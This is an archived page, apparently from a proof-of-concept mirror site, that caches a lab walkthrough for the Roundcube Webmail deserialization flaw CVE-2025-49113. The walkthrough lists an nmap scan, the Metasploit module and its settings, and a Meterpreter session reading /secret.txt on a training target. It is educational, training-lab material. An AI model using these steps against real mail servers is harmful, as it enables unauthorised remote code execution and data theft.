CVE-2025-49113 PoC — Roundcube Webmail 安全漏洞

Source

https://github.com/ankitpandey383/roundcube-cve-2025-49113-lab

Associated Vulnerability

Title:Roundcube Webmail 安全漏洞 (CVE-2025-49113)
Description:Roundcube Webmail是Roundcube开源的一款基于浏览器的开源IMAP客户端，它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.10之前版本和 1.6.11之前版本存在安全漏洞，该漏洞源于未验证_from参数，可能导致PHP对象反序列化攻击。

Description

Hands-on exploitation lab for Roundcube Webmail CVE-2025-49113 (authenticated PHP object deserialization → RCE) to read /secret.txt.

Readme

"DISCLAIMER: Educational Use Only"

# Roundcube Webmail RCE – CVE-2025-49113 Lab
This repository documents my step-by-step exploitation of **Roundcube Webmail CVE-2025-49113** in a controlled lab to obtain the secret stored in `/secret.txt`.
> ⚠️ **Disclaimer**  
> All work was performed against a lab / training environment that I am authorised to test.  
> Do **not** use these techniques against systems you do not own or administrate.
---
## Challenge
Roundcube Webmail is a browser-based, open-source PHP email client that connects to mailboxes via IMAP and sends mail via SMTP. It commonly runs on Apache or Nginx with MySQL/PostgreSQL/SQLite and is widely used in shared hosting environments.

**Vulnerability – CVE-2025-49113**

All Roundcube versions up to and including `1.6.10` (and `1.5.x` before `1.5.10`) contain a critical bug in `program/actions/settings/upload.php`. The `_from` parameter is not properly validated, which allows an authenticated attacker to trigger **unsafe PHP object deserialization** and achieve **remote code execution** with web server privileges.

**Lab credentials:**

- Username: `roundcube`  
- Password: `rcpass`  

**Goal:**  
> *What is the secret inside the `/secret.txt` file?*

---

## Lab Environment

- Attacker host: Kali / HackerBox with:
  - `nmap`
  - `msfconsole` (Metasploit 6)
- Target host: Roundcube Webmail on `172.20.2.57`
- Exploit used: `exploit/multi/http/roundcube_auth_rce_cve_2025_49113`
---
## Walkthrough

### Step 1 – Service discovery with Nmap
Command:
nmap -sV Target Machine
### Step 2 - Locating a PHP object deserialization exploit in Metasploit
# search php object deserialization
### Step 3 - Configuring the Roundcube exploit module
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine 
msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
### Step 4 - Getting a Meterpreter session and reading /secret.txt
meterpreter > cat /secret.txt

File Snapshot


 [4.0K]  /data/pocs/445a763d0edce3fb0a8f8546395da1b87ddf545a
├── [ 619]  Defensive Recommendations
├── [1.0K]  License
├── [2.2K]  README.md
├── [106K]  Step-1.jpg
├── [138K]  Step-2.jpg
├── [ 66K]  Step-3.jpg
└── [100K]  Step-4.jpg

1 directory, 7 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!